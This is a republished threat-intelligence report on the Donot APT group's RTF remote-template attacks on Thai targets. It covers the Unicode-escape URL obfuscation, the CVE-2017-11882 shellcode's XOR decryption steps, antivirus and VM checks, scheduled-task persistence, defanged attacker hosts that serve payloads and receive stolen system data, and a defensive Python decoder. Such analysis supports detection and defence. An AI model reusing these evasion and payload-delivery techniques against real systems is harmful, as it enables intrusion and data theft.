2025-02-27 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/03 Report--
This article explains how the Donot group uses RTF template injection to attack surrounding countries and regions. I think it is very practical, so I am sharing it with you and hope you get something out of it. Let's take a look.
Overview
Donot ("belly brain worm", APT-C-35) is an APT group suspected to have a South Asian background. It mainly carries out cyber attacks against government agencies of neighbouring countries, usually to steal sensitive information, and has the ability to attack both Windows and Android platforms.
Recently, the Red Raindrop team of the Qianxin Threat Intelligence Center found during daily threat hunting that the Donot APT group has been attacking frequently, using malicious RTF template injection together with Equation Editor exploit samples to carry out many attacks on neighbouring countries and regions. According to the Red Raindrop researchers' tracking analysis, the attacks have the following characteristics:
In this campaign, Donot began using the \*\template control word in RTF documents to load remote malicious template files. This technique evades antivirus well: when the samples were first uploaded to VirusTotal there were almost no detections.
The captured samples use titles such as "Royal Thai Navy Command and Staff Course No. 82", "OPS check details", "OPS requirements" and "Ministry of Defense copy" as decoy documents. OPS is suspected to be an oil and gas company based in Thailand; based on the decoy titles, the group is suspected of targeting Thailand.
This campaign is similar to the attack we disclosed in February: the payload is loaded through multiple layers of decryption and is mostly stored in the "jack" directory of the group's server.
No domestic impact has been found. All products based on threat intelligence data from the Qianxin Threat Intelligence Center, including the Threat Intelligence Platform (TIP), SkyEye Advanced Threat Detection System, NGSOC and Qianxin Situation Awareness, already support accurate detection of this APT group's attack activity.
Sample information
Most of the samples captured this time use Thailand-related information as the bait title; some of the sample information is shown in the following table:
File name                                            MD5
OPS_requirements.doc                                 8cc87eb3667aecc1bd41018f00aca559
OPS Clearance Details.doc                            b7e07104bc65619b55431f6cbaaaea29
Royal Thai Navy 82nd Command and Staff course.doc    d4b45f7a937139e05f386a8ad0aba04e
Contract copy-11 Feb 21.doc                          6275908396d4a55c1ad8a21a82e6ada8
MOD_Copy.doc                                         5fdcbb85733f9e8686d582b2f1459961
Almost all samples are RTF documents that load a remote template carrying the Equation Editor vulnerability, and the stored remote link is obfuscated, as shown in the following figure:
This technique is extremely effective at evading antivirus: when the sample was first uploaded to VirusTotal there were almost no detections:
When the sample runs, it attempts to fetch the remote template file, load it and execute it. Once the remote template containing the Equation Editor vulnerability is loaded and the exploit succeeds, the malicious payload is downloaded and passed through multiple layers of decryption before execution. The overall execution flow is shown in the following figure:
Detailed analysis
Take the sample 5fdcbb85733f9e8686d582b2f1459961 as an example. Its information is as follows:
File name: MOD_Copy.doc
MD5: 5fdcbb85733f9e8686d582b2f1459961
File format: RTF
Remote template file address: http[:]//worldoption.xyz/jack/6Tuni6MNu5EMiSHjVywGxKsA1KnRi8Se.do
The file uses the \*\template control word, and its parameter is the URL as an obfuscated Unicode string.
In RTF, \uN? represents a Unicode character: \u is followed by a signed 16-bit decimal integer N and then a placeholder character (here ?) that is shown by readers without Unicode support. Because N is a signed 16-bit value, a code point greater than 32767 is written as a negative number, and the parser reduces the value modulo 65536. The obfuscation abuses this wrap-around to write ordinary ASCII characters as negative numbers as well. Resolving the example:
L"h" == 0x0068 == -(-0x0068) == -(0xFFFF + 1 - 0x68) == -65432 (modulo 0x10000), so \u-65432? decodes to "h".
After the sample runs, the attempt to load the remote template file is clearly visible:
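As an added example (not code from the original report), a small Python decoder that undoes the \uN? wrap-around obfuscation described above and pulls the target out of an RTF {\*\template ...} group, so a triage script can flag documents whose template points at a remote host. The RTF fragment and the URL are constructed here; the decoder also accepts the ordinary positive form and a \'hh fallback byte, which goes slightly beyond the single "h" example in the text.

```python
import re

# Constructed test input (not a real sample): the remote template URL sits in a
# {\*\template ...} group with every character written as \uN?, where N is the
# code point minus 65536, exactly as the report shows for "h" (-65432).
def encode_obfuscated(text: str) -> str:
    """Write each character as \\uN? with N shifted below zero by 65536."""
    return "".join(f"\\u{ord(c) - 65536}?" for c in text)

SAMPLE_URL = "http://template-host.invalid/jack/remote.dot"  # placeholder host
SAMPLE_RTF = ("{\\rtf1\\ansi\\deff0{\\*\\template "
              + encode_obfuscated(SAMPLE_URL) + "}\\par }")

# \uN, an optional space, then one fallback character (plain or a \'hh escape)
UNICODE_ESC = re.compile(r"\\u(-?\d+) ?(?:\\'[0-9a-fA-F]{2}|.)")

def decode_unicode_escapes(s: str) -> str:
    """Decode RTF \\uN? sequences the way Word does: N is treated as a 16-bit
    value, so negative or out-of-range numbers wrap modulo 65536. That wrap is
    what lets -65432 stand for "h" (0x68)."""
    return UNICODE_ESC.sub(lambda m: chr(int(m.group(1)) % 65536), s)

TEMPLATE_GROUP = re.compile(r"\{\\\*\\template\s*([^{}]*)\}")

def extract_template_url(rtf: str):
    """Return the decoded \\*\\template target, or None if there is none."""
    m = TEMPLATE_GROUP.search(rtf)
    return decode_unicode_escapes(m.group(1)).strip() if m else None

def is_remote_template(rtf: str) -> bool:
    """True when the template target is a URL rather than a local path."""
    target = extract_template_url(rtf)
    return target is not None and target.lower().startswith(("http://", "https://"))

if __name__ == "__main__":
    print("decoded template target:", extract_template_url(SAMPLE_RTF))
    print("remote template:", is_remote_template(SAMPLE_RTF))
```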
The server hosting the remote template files is an open directory containing several malicious files, as shown below:
The loaded remote template file is an Equation Editor exploit sample. Its basic information is as follows:
File name: 6Tuni6MNu5EMiSHjVywGxKsA1KnRi8Se.dot
MD5: 87f2ff9f2cb1cc3be9cc6d2adbc9efcd
Vulnerability exploited: CVE-2017-11882
After successful exploitation, control is transferred to the shellcode, which first performs XOR decryption:
After decryption, the file is downloaded from "http[:]//worldoption.xyz/jack/6Tuni6MNu5EMiSHjVywGxKsA1KnRi8Se" via URLDownloadToCacheFileA. The file is encrypted shellcode data.
After the download succeeds, the decryption routine runs: it applies bitwise NOT and XOR with 0x64 and 0xDEE89A75 in a loop until the expected value is matched, then checks whether the header byte is 0x90. If it equals 0x90, it proceeds to the next step.
A further XOR decryption with 0xAB follows.
It then checks for the driver files of Kaspersky, Avast, NOD32, McAfee and 360 antivirus products to detect installed security software.
After the check, 0xD29 bytes of shellcode are XOR-decrypted with 0xFE, and then 0x100 bytes are XOR-decrypted with 0xCE.
After the decryption succeeds, execution moves to the second-stage shellcode, which downloads the file from http[:]//worldoption.xyz/jack/6Tuni6MNu5EMiSHjVywGxKsA1KnRi8Se.dat to %Appdata%\wingui.dll via URLDownloadToFileA and repairs its DOS header.
It then downloads the file from http[:]//worldoption.xyz/jack/6Tuni6MNu5EMiSHjVywGxKsA1KnRi8Se.doc to %Temp%\doucument.doc via URLDownloadToFileA as a decoy to mislead the victim.
After the download succeeds, it creates a scheduled task that runs wingui.dll every three minutes, calling its export function HPMG.
The scheduled task created is shown in the following figure:
The dropped wingui.dll is common malicious code used by the Donot group. Its basic information is as follows:
File name: 6Tuni6MNu5EMiSHjVywGxKsA1KnRi8Se.dat
MD5: 17d0da6f523a7463c3e9db424f95ab42
Timestamp: Monday, 01.03.2021 07:16:50 UTC
Export DLL name: Mvcupdte.dll
Once the scheduled task loads the DLL, the export function HPMG is called. It first delays execution by calling time64 twice and checking the difference against a parameter.
It creates a mutex named "WinMsCompany" to ensure that only one instance is running.
It uses wmic to detect a VMware virtual machine environment.
It collects the user name and computer name, and uses WQL queries to retrieve system properties, CPU information and hardware information.
It enumerates file information under "\Program Files" and "\Program Files (x86)" on the system drive.
The collected system information is concatenated and formatted.
The data is encoded and the data fields are assembled.
It first makes two requests to wiki, then sends a POST request to saltpodium.xyz/vocha/ogo and writes the downloaded data to C:\ProgramData\MJuego\JacaPM.dll.
It runs the export function HWG of JacaPM.dll via rundll32 and creates a scheduled task.
It writes windows.bat with the incoming parameters to the Temp directory and runs it to remove the scheduled task and delete itself.
The "queen" directory on the same domain also holds several malicious files; these are 64-bit versions of the malicious code, with functionality consistent with the 32-bit program.
Traceability correlation
The Red Raindrop team of the Qianxin Threat Intelligence Center, using the center's ALPHA platform (ti.qianxin.com), correlated the attack methods, malicious code and other aspects and found a high similarity between this attack and Donot. The Donot sample c92901f2ef13374f4afd950d840e02c1 described in the "Summary and analysis of APT group attack activity in South Asia in January 2021" has consistent functionality and payload execution flow; in this attack, a hidden function was added to the DLL file and the virtual machine sandbox detection method was replaced, indicating that the Donot group is constantly updating its attack weapons.
Based on the domain cachepage.icu requested by sample d4b45f7a937139e05f386a8ad0aba04e, a new sample 7a6559ff13f2aecd89c64c1704a68588 can be associated; it injects shellcode by thread to download the subsequent payload.
Summary
Donot is a long-active APT group with both Windows and Android attack capability that constantly updates its arsenal. This is the first time it has been seen loading remote template files from RTF to evade antivirus, and the effect is excellent. The Qianxin Threat Intelligence Center will continue to track the group's attacks.
The Qianxin Threat Intelligence Center once again reminds enterprise users that strengthening employees' security awareness training is the most important link in building enterprise information security. Where necessary, enterprises can build situational awareness, improve asset management and continuous monitoring capabilities, and actively introduce threat intelligence to defend against such attacks as far as possible.
At present, all products based on threat intelligence data from the Qianxin Threat Intelligence Center, including the Threat Intelligence Platform (TIP), SkyEye Advanced Threat Detection System, NGSOC and Qianxin Situation Awareness, already support accurate detection of this APT group's attack activity.
That is how the Donot group uses RTF template injection to attack surrounding regions. The editor believes there are some points here that we may see or use in our daily work. I hope you learn more from this article; for more details, please follow the industry information channel.